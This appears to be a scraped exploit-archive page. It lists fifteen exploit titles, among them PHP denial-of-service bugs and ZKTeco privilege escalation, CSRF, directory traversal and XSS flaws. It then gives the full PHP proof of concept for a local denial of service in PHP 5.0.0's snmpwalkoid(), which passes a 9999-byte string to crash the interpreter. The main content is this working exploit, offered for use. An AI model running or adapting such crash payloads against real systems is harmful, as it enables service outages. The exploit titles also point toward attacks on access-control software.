
15 new exploits WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Dislcosure/Arbitrary File Upload PHP 5.0.0 - snmpwalkoid() Local Denial of Service PHP 5.0.0 - fbird_[p]connect() Local Denial of Service PHP 5.0.0 - snmpwalk() Local Denial of Service PHP 5.0.0 - snmprealwalk() Local Denial of Service PHP 5.0.0 - snmpset() Local Denial of Service PHP 7.0 - AppendIterator::append Local Denial of Service ZKTeco ZKTime.Net 3.0.1.6 - Insecure File Permissions Privilege Escalation ZKTeco ZKAccess Professional 3.5.3 - Insecure File Permissions Privilege Escalation ZKTeco ZKBioSecurity 3.0 - Hardcoded Credentials Remote SYSTEM Code Execution ZKTeco ZKBioSecurity 3.0 - (Add Superadmin) Cross-Site Request Forgery ZKTeco ZKBioSecurity 3.0 - Directory Traversal ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authorization Bypass ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service
15 lines
No EOL
648 B
PHP
Executable file
15 lines
No EOL
648 B
PHP
Executable file
<?php
|
|
#############################################################################
|
|
## PHP 5.0.0 snmpwalkoid() Local Denial of Service
|
|
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
|
|
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
|
|
## Date: 26/08/2016
|
|
## Local Denial of Service
|
|
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
|
|
## http://www.black-rose.ml
|
|
#############################################################################
|
|
if (!extension_loaded("snmp")) die("You need snmp extension loaded!");
|
|
|
|
$str = str_repeat('A', 9999);
|
|
snmpwalkoid('127.0.0.1', 'public', $str);
|
|
?>
|